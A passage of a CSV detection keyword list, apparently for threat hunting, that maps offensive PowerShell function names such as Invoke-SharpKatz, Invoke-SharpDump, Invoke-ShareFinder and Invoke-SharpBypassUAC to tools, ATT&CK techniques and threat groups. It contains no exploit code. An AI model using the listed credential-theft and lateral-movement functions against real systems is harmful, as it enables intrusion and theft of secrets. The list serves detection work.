- T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,PowerUp.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Invoke-ServiceAbuse*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Invoke-Service-persistence.ps1*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z
-*Invoke-ServicesImagePermissionsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-ServicesImagePermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-ServicesPermissionsCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-ServicesPermissionsCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-ServicesPermissionsRegistryCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-ServicesPermissionsRegistryCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-ServicesUnquotedPathCheck*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-ServicesUnquotedPathCheck*,offensive_tool_keyword,PrivescCheck,Privilege Escalation Enumeration Script for Windows,T1053 - T1088,TA0005 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/itm4n/PrivescCheck,1,1,N/A,N/A,10,2247,370,2023-09-03T15:14:46Z,2020-01-16T12:28:10Z
-*Invoke-SessionGopher*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z
-*Invoke-SessionGopher*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Invoke-SessionGopher*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*Invoke-SessionGopher*,offensive_tool_keyword,nishang,Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/samratashok/nishang,1,1,N/A,N/A,10,7849,2360,2023-09-05T07:54:08Z,2014-05-19T11:48:24Z
-*Invoke-ShadowSpray*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*invoke-sharefinder *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z
-*invokesharefinder*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z
-*Invoke-ShareFinder*,offensive_tool_keyword,cobaltstrike,PowerView menu for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/tevora-threat/aggressor-powerview,1,1,N/A,10,10,60,17,2018-03-22T00:21:57Z,2018-03-22T00:21:13Z
-*Invoke-ShareFinder*,offensive_tool_keyword,conti,Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid,T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080,TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040,Conti Ransomware,Wizard Spider,Ransomware,https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Invoke-ShareFinder*,offensive_tool_keyword,Jira-Lens,finds (non-standard) shares on hosts in the local domain,T1595 T1590 T1591,N/A,N/A,N/A,Reconnaissance,https://powersploit.readthedocs.io/en/stable/Recon/README/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*Invoke-ShareFinder*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z
-*Invoke-SharpAllowedToAct*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpBlock*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpBypassUAC*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpChromium*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpClipboard*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpCloud*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpCloud*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Invoke-Sharpcradle*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Invoke-SharpDPAPI*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpDump*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharPersist*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpGPO*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z
-*Invoke-SharpGPOAbuse*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpGPO-RemoteAccessPolicies*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z
-*Invoke-SharpHandler*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - 
TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpHide*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*InvokeSharpHound*,offensive_tool_keyword,sharphound,C# Data Collector for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/BloodHoundAD/SharpHound,1,1,N/A,N/A,5,440,124,2023-09-28T19:43:14Z,2021-07-12T17:07:04Z -*Invoke-Sharphound*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Sharphound2*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharphound3*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpHound4*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation 
tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-Sharphound4*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpImpersonation*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpImpersonation*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpImpersonationNoSpace*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpKatz*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpLdapRelayScan*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - 
TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpLdapRelayScan*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-Sharplocker*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpLoginPrompt*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpMove*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpPrinter*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpPrinter*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpPrintNightmare*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpRDP*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpRDP.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*Invoke-SharpSCCM*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,1,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -*Invoke-SharpSCCM*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*Invoke-SharpSecDump*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects 
